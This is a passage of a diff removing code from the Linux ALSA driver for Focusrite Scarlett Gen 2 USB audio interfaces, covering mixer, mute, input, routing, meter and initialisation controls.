+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-	int err, i;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-
+-	if (!info->has_talkback)
+-		return 0;
+-
+-	err = scarlett2_add_new_ctl(
+-		mixer, &scarlett2_talkback_enum_ctl,
+-		0, 1, "Talkback Playback Enum",
+-		&private->talkback_ctl);
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0; i < num_mixes; i++) {
+-		snprintf(s, sizeof(s),
+-			 "Talkback Mix %c Playback Switch", i + 'A');
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_talkback_map_ctl,
+-					    i, 1, s, NULL);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-/*** Dim/Mute Controls ***/
+-
+-static int scarlett2_dim_mute_ctl_get(struct snd_kcontrol *kctl,
+-				      struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->dim_mute[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_dim_mute_ctl_put(struct snd_kcontrol *kctl,
+-				      struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-
+-	int index = elem->control;
+-	int oval, val, err = 0, i;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->dim_mute[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->dim_mute[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_DIM_MUTE,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-	if (index == SCARLETT2_BUTTON_MUTE)
+-		for (i = 0; i < num_line_out; i++) {
+-			int line_index = line_out_remap(private, i);
+-
+-			if (private->vol_sw_hw_switch[line_index]) {
+-				private->mute_switch[line_index] = val;
+-				snd_ctl_notify(mixer->chip->card,
+-					       SNDRV_CTL_EVENT_MASK_VALUE,
+-					       &private->mute_ctls[i]->id);
+-			}
+-		}
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_dim_mute_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_dim_mute_ctl_get,
+-	.put  = scarlett2_dim_mute_ctl_put
+-};
+-
+-/*** Create the analogue output controls ***/
+-
+-static int scarlett2_add_line_out_ctls(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int err, i;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-
+-	/* Add R/O HW volume control */
+-	if (info->line_out_hw_vol) {
+-		snprintf(s, sizeof(s), "Master HW Playback Volume");
+-		err = scarlett2_add_new_ctl(mixer,
+-					    &scarlett2_master_volume_ctl,
+-					    0, 1, s, &private->master_vol_ctl);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add volume controls */
+-	for (i = 0; i < num_line_out; i++) {
+-		int index = line_out_remap(private, i);
+-
+-		/* Fader */
+-		if (info->line_out_descrs[i])
+-			snprintf(s, sizeof(s),
+-				 "Line %02d (%s) Playback Volume",
+-				 i + 1, info->line_out_descrs[i]);
+-		else
+-			snprintf(s, sizeof(s),
+-				 "Line %02d Playback Volume",
+-				 i + 1);
+-		err = scarlett2_add_new_ctl(mixer,
+-					    &scarlett2_line_out_volume_ctl,
+-					    i, 1, s, &private->vol_ctls[i]);
+-		if (err < 0)
+-			return err;
+-
+-		/* Mute Switch */
+-		snprintf(s, sizeof(s),
+-			 "Line %02d Mute Playback Switch",
+-			 i + 1);
+-		err = scarlett2_add_new_ctl(mixer,
+-					    &scarlett2_mute_ctl,
+-					    i, 1, s,
+-					    &private->mute_ctls[i]);
+-		if (err < 0)
+-			return err;
+-
+-		/* Make the fader and mute controls read-only if the
+-		 * SW/HW switch is set to HW
+-		 */
+-		if (private->vol_sw_hw_switch[index])
+-			scarlett2_vol_ctl_set_writable(mixer, i, 0);
+-
+-		/* SW/HW Switch */
+-		if (info->line_out_hw_vol) {
+-			snprintf(s, sizeof(s),
+-				 "Line Out %02d Volume Control Playback Enum",
+-				 i + 1);
+-			err = scarlett2_add_new_ctl(mixer,
+-						    &scarlett2_sw_hw_enum_ctl,
+-						    i, 1, s,
+-						    &private->sw_hw_ctls[i]);
+-			if (err < 0)
+-				return err;
+-
+-			/* Make the switch read-only if the line is
+-			 * involved in speaker switching
+-			 */
+-			if (private->speaker_switching_switch && i < 4)
+-				scarlett2_sw_hw_ctl_ro(private, i);
+-		}
+-	}
+-
+-	/* Add dim/mute controls */
+-	if (info->line_out_hw_vol)
+-		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++) {
+-			err = scarlett2_add_new_ctl(
+-				mixer, &scarlett2_dim_mute_ctl,
+-				i, 1, scarlett2_dim_mute_names[i],
+-				&private->dim_mute_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-
+-	return 0;
+-}
+-
+-/*** Create the analogue input controls ***/
+-
+-static int scarlett2_add_line_in_ctls(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	int err, i;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-	const char *fmt = "Line In %d %s Capture %s";
+-	const char *fmt2 = "Line In %d-%d %s Capture %s";
+-
+-	/* Add input level (line/inst) controls */
+-	for (i = 0; i < info->level_input_count; i++) {
+-		snprintf(s, sizeof(s), fmt, i + 1 + info->level_input_first,
+-			 "Level", "Enum");
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_level_enum_ctl,
+-					    i, 1, s, &private->level_ctls[i]);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add input pad controls */
+-	for (i = 0; i < info->pad_input_count; i++) {
+-		snprintf(s, sizeof(s), fmt, i + 1, "Pad", "Switch");
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_pad_ctl,
+-					    i, 1, s, &private->pad_ctls[i]);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add input air controls */
+-	for (i = 0; i < info->air_input_count; i++) {
+-		snprintf(s, sizeof(s), fmt, i + 1, "Air", "Switch");
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_air_ctl,
+-					    i, 1, s, &private->air_ctls[i]);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add input phantom controls */
+-	if (info->inputs_per_phantom == 1) {
+-		for (i = 0; i < info->phantom_count; i++) {
+-			snprintf(s, sizeof(s), fmt, i + 1,
+-				 "Phantom Power", "Switch");
+-			err = scarlett2_add_new_ctl(
+-				mixer, &scarlett2_phantom_ctl,
+-				i, 1, s, &private->phantom_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-	} else if (info->inputs_per_phantom > 1) {
+-		for (i = 0; i < info->phantom_count; i++) {
+-			int from = i * info->inputs_per_phantom + 1;
+-			int to = (i + 1) * info->inputs_per_phantom;
+-
+-			snprintf(s, sizeof(s), fmt2, from, to,
+-				 "Phantom Power", "Switch");
+-			err = scarlett2_add_new_ctl(
+-				mixer, &scarlett2_phantom_ctl,
+-				i, 1, s, &private->phantom_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-	}
+-	if (info->phantom_count) {
+-		err = scarlett2_add_new_ctl(
+-			mixer, &scarlett2_phantom_persistence_ctl, 0, 1,
+-			"Phantom Power Persistence Capture Switch", NULL);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-/*** Mixer Volume Controls ***/
+-
+-static int scarlett2_mixer_ctl_info(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = elem->channels;
+-	uinfo->value.integer.min = 0;
+-	uinfo->value.integer.max = SCARLETT2_MIXER_MAX_VALUE;
+-	uinfo->value.integer.step = 1;
+-	return 0;
+-}
+-
+-static int scarlett2_mixer_ctl_get(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->mix[elem->control];
+-	return 0;
+-}
+-
+-static int scarlett2_mixer_ctl_put(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int oval, val, num_mixer_in, mix_num, err = 0;
+-	int index = elem->control;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->mix[index];
+-	val = clamp(ucontrol->value.integer.value[0],
+-		    0L, (long)SCARLETT2_MIXER_MAX_VALUE);
+-	num_mixer_in = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-	mix_num = index / num_mixer_in;
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->mix[index] = val;
+-	err = scarlett2_usb_set_mix(mixer, mix_num);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const DECLARE_TLV_DB_MINMAX(
+-	db_scale_scarlett2_mixer,
+-	SCARLETT2_MIXER_MIN_DB * 100,
+-	SCARLETT2_MIXER_MAX_DB * 100
+-);
+-
+-static const struct snd_kcontrol_new scarlett2_mixer_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
+-		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
+-	.name = "",
+-	.info = scarlett2_mixer_ctl_info,
+-	.get  = scarlett2_mixer_ctl_get,
+-	.put  = scarlett2_mixer_ctl_put,
+-	.private_value = SCARLETT2_MIXER_MAX_DB, /* max value */
+-	.tlv = { .p = db_scale_scarlett2_mixer }
+-};
+-
+-static int scarlett2_add_mixer_ctls(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int err, i, j;
+-	int index;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-
+-	int num_inputs =
+-		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-	int num_outputs =
+-		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-
+-	for (i = 0, index = 0; i < num_outputs; i++)
+-		for (j = 0; j < num_inputs; j++, index++) {
+-			snprintf(s, sizeof(s),
+-				 "Mix %c Input %02d Playback Volume",
+-				 'A' + i, j + 1);
+-			err = scarlett2_add_new_ctl(mixer, &scarlett2_mixer_ctl,
+-						    index, 1, s, NULL);
+-			if (err < 0)
+-				return err;
+-		}
+-
+-	return 0;
+-}
+-
+-/*** Mux Source Selection Controls ***/
+-
+-static int scarlett2_mux_src_enum_ctl_info(struct snd_kcontrol *kctl,
+-					   struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	unsigned int item = uinfo->value.enumerated.item;
+-	int items = private->num_mux_srcs;
+-	int port_type;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_ENUMERATED;
+-	uinfo->count = elem->channels;
+-	uinfo->value.enumerated.items = items;
+-
+-	if (item >= items)
+-		item = uinfo->value.enumerated.item = items - 1;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		if (item < port_count[port_type][SCARLETT2_PORT_IN]) {
+-			const struct scarlett2_port *port =
+-				&scarlett2_ports[port_type];
+-
+-			sprintf(uinfo->value.enumerated.name,
+-				port->src_descr, item + port->src_num_offset);
+-			return 0;
+-		}
+-		item -= port_count[port_type][SCARLETT2_PORT_IN];
+-	}
+-
+-	return -EINVAL;
+-}
+-
+-static int scarlett2_mux_src_enum_ctl_get(struct snd_kcontrol *kctl,
+-					  struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->mux_updated) {
+-		err = scarlett2_usb_get_mux(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->mux[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
+-					  struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->mux[index];
+-	val = min(ucontrol->value.enumerated.item[0],
+-		  private->num_mux_srcs - 1U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->mux[index] = val;
+-	err = scarlett2_usb_set_mux(mixer);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_mux_src_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_mux_src_enum_ctl_info,
+-	.get  = scarlett2_mux_src_enum_ctl_get,
+-	.put  = scarlett2_mux_src_enum_ctl_put,
+-};
+-
+-static int scarlett2_add_mux_enums(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int port_type, channel, i;
+-
+-	for (i = 0, port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		for (channel = 0;
+-		     channel < port_count[port_type][SCARLETT2_PORT_OUT];
+-		     channel++, i++) {
+-			int err;
+-			char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-			const char *const descr =
+-				scarlett2_ports[port_type].dst_descr;
+-
+-			snprintf(s, sizeof(s) - 5, descr, channel + 1);
+-			strcat(s, " Enum");
+-
+-			err = scarlett2_add_new_ctl(mixer,
+-						    &scarlett2_mux_src_enum_ctl,
+-						    i, 1, s,
+-						    &private->mux_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-/*** Meter Controls ***/
+-
+-static int scarlett2_meter_ctl_info(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = elem->channels;
+-	uinfo->value.integer.min = 0;
+-	uinfo->value.integer.max = 4095;
+-	uinfo->value.integer.step = 1;
+-	return 0;
+-}
+-
+-static int scarlett2_meter_ctl_get(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	u16 meter_levels[SCARLETT2_MAX_METERS];
+-	int i, err;
+-
+-	err = scarlett2_usb_get_meter_levels(elem->head.mixer, elem->channels,
+-					     meter_levels);
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0; i < elem->channels; i++)
+-		ucontrol->value.integer.value[i] = meter_levels[i];
+-
+-	return 0;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_meter_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_PCM,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READ | SNDRV_CTL_ELEM_ACCESS_VOLATILE,
+-	.name = "",
+-	.info = scarlett2_meter_ctl_info,
+-	.get  = scarlett2_meter_ctl_get
+-};
+-
+-static int scarlett2_add_meter_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	/* devices without a mixer also don't support reporting levels */
+-	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_meter_ctl,
+-				     0, private->num_mux_dsts,
+-				     "Level Meter", NULL);
+-}
+-
+-/*** MSD Controls ***/
+-
+-static int scarlett2_msd_ctl_get(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->msd_switch;
+-	return 0;
+-}
+-
+-static int scarlett2_msd_ctl_put(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->msd_switch;
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->msd_switch = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MSD_SWITCH,
+-				       0, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_msd_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_msd_ctl_get,
+-	.put  = scarlett2_msd_ctl_put,
+-};
+-
+-static int scarlett2_add_msd_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	if (!info->has_msd_mode)
+-		return 0;
+-
+-	/* If MSD mode is off, hide the switch by default */
+-	if (!private->msd_switch && !(mixer->chip->setup & SCARLETT2_MSD_ENABLE))
+-		return 0;
+-
+-	/* Add MSD control */
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_msd_ctl,
+-				     0, 1, "MSD Mode Switch", NULL);
+-}
+-
+-/*** Standalone Control ***/
+-
+-static int scarlett2_standalone_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->standalone_switch;
+-	return 0;
+-}
+-
+-static int scarlett2_standalone_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->standalone_switch;
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->standalone_switch = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer,
+-				       SCARLETT2_CONFIG_STANDALONE_SWITCH,
+-				       0, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_standalone_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_standalone_ctl_get,
+-	.put  = scarlett2_standalone_ctl_put,
+-};
+-
+-static int scarlett2_add_standalone_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	/* Add standalone control */
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_standalone_ctl,
+-				     0, 1, "Standalone Switch", NULL);
+-}
+-
+-/*** Cleanup/Suspend Callbacks ***/
+-
+-static void scarlett2_private_free(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	cancel_delayed_work_sync(&private->work);
+-	kfree(private);
+-	mixer->private_data = NULL;
+-}
+-
+-static void scarlett2_private_suspend(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	if (cancel_delayed_work_sync(&private->work))
+-		scarlett2_config_save(private->mixer);
+-}
+-
+-/*** Initialisation ***/
+-
+-static void scarlett2_count_mux_io(struct scarlett2_data *private)
+-{
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int port_type, srcs = 0, dsts = 0;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		srcs += port_count[port_type][SCARLETT2_PORT_IN];
+-		dsts += port_count[port_type][SCARLETT2_PORT_OUT];
+-	}
+-
+-	private->num_mux_srcs = srcs;
+-	private->num_mux_dsts = dsts;
+-}
+-
+-/* Look through the interface descriptors for the Focusrite Control
+- * interface (bInterfaceClass = 255 Vendor Specific Class) and set
+- * bInterfaceNumber, bEndpointAddress, wMaxPacketSize, and bInterval
+- * in private
+- */
+-static int scarlett2_find_fc_interface(struct usb_device *dev,
+-				       struct scarlett2_data *private)
+-{
+-	struct usb_host_config *config = dev->actconfig;
+-	int i;
+-
+-	for (i = 0; i < config->desc.bNumInterfaces; i++) {
+-		struct usb_interface *intf = config->interface[i];
+-		struct usb_interface_descriptor *desc =
+-			&intf->altsetting[0].desc;
+-		struct usb_endpoint_descriptor *epd;
+-
+-		if (desc->bInterfaceClass != 255)
+-			continue;
+-
+-		epd = get_endpoint(intf->altsetting, 0);
+-		private->bInterfaceNumber = desc->bInterfaceNumber;
+-		private->bEndpointAddress = epd->bEndpointAddress &
+-			USB_ENDPOINT_NUMBER_MASK;
+-		private->wMaxPacketSize = le16_to_cpu(epd->wMaxPacketSize);
+-		private->bInterval = epd->bInterval;
+-		return 0;
+-	}
+-
+-	return -EINVAL;
+-}
+-
+-/* Initialise private data */
+-static int scarlett2_init_private(struct usb_mixer_interface *mixer,
+-				  const struct scarlett2_device_info *info)
+-{
+-	struct scarlett2_data *private =
+-		kzalloc(sizeof(struct scarlett2_data), GFP_KERNEL);
+-
+-	if (!private)
+-		return -ENOMEM;
+-
+-	mutex_init(&private->usb_mutex);
+-	mutex_init(&private->data_mutex);
+-	INIT_DELAYED_WORK(&private->work, scarlett2_config_save_work);
+-
+-	mixer->private_data = private;
+-	mixer->private_free = scarlett2_private_free;
+-	mixer->private_suspend = scarlett2_private_suspend;
+-
+-	private->info = info;
+-	scarlett2_count_mux_io(private);
+-	private->scarlett2_seq = 0;
+-	private->mixer = mixer;
+-
+-	return scarlett2_find_fc_interface(mixer->chip->dev, private);
+-}
+-
+-/* Cargo cult proprietary initialisation sequence */
+-static int scarlett2_usb_init(struct usb_mixer_interface *mixer)
+-{
+-	struct usb_device *dev = mixer->chip->dev;
+-	struct scarlett2_data *private = mixer->private_data;
+-	u8 buf[24];
+-	int err;
+-
+-	if (usb_pipe_type_check(dev, usb_sndctrlpipe(dev, 0)))
+-		return -EINVAL;
+-
+-	/* step 0 */
+-	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
+-			       SCARLETT2_USB_CMD_INIT, buf, sizeof(buf));
+-	if (err < 0)
+-		return err;
+-
+-	/* step 1 */
+-	private->scarlett2_seq = 1;
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_INIT_1, NULL, 0, NULL, 0);
+-	if (err < 0)
+-		return err;
+-
+-	/* step 2 */
+-	private->scarlett2_seq = 1;
+-	return scarlett2_usb(mixer, SCARLETT2_USB_INIT_2, NULL, 0, NULL, 84);
+-}
+-
+-/* Read configuration from the interface on start */
+-static int scarlett2_read_configs(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int num_mixer_out =
+-		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-	struct scarlett2_usb_volume_status volume_status;
+-	int err, i;
+-
+-	if (info->has_msd_mode) {
+-		err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_MSD_SWITCH,
+-			1, &private->msd_switch);
+-		if (err < 0)
+-			return err;
+-
+-		/* no other controls are created if MSD mode is on */
+-		if (private->msd_switch)
+-			return 0;
+-	}
+-
+-	err = scarlett2_update_input_other(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_update_monitor_other(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* the rest of the configuration is for devices with a mixer */
+-	if (info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	err = scarlett2_usb_get_config(
+-		mixer, SCARLETT2_CONFIG_STANDALONE_SWITCH,
+-		1, &private->standalone_switch);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_update_sync(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
+-	if (err < 0)
+-		return err;
+-
+-	if (info->line_out_hw_vol)
+-		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
+-			private->dim_mute[i] = !!volume_status.dim_mute[i];
+-
+-	private->master_vol = clamp(
+-		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
+-		0, SCARLETT2_VOLUME_BIAS);
+-
+-	for (i = 0; i < num_line_out; i++) {
+-		int volume, mute;
+-
+-		private->vol_sw_hw_switch[i] =
+-			info->line_out_hw_vol
+-				&& volume_status.sw_hw_switch[i];
+-
+-		volume = private->vol_sw_hw_switch[i]
+-			   ? volume_status.master_vol
+-			   : volume_status.sw_vol[i];
+-		volume = clamp(volume + SCARLETT2_VOLUME_BIAS,
+-			       0, SCARLETT2_VOLUME_BIAS);
+-		private->vol[i] = volume;
+-
+-		mute = private->vol_sw_hw_switch[i]
+-			 ? private->dim_mute[SCARLETT2_BUTTON_MUTE]
+-			 : volume_status.mute_switch[i];
+-		private->mute_switch[i] = mute;
+-	}
+-
+-	for (i = 0; i < num_mixer_out; i++) {
+-		err = scarlett2_usb_get_mix(mixer, i);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return scarlett2_usb_get_mux(mixer);
+-}
+-
+-/* Notify on sync change */
+-static void scarlett2_notify_sync(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	private->sync_updated = 1;
+-
+-	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-		       &private->sync_ctl->id);
+-}
+-
+-/* Notify on monitor change */
+-static void scarlett2_notify_monitor(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
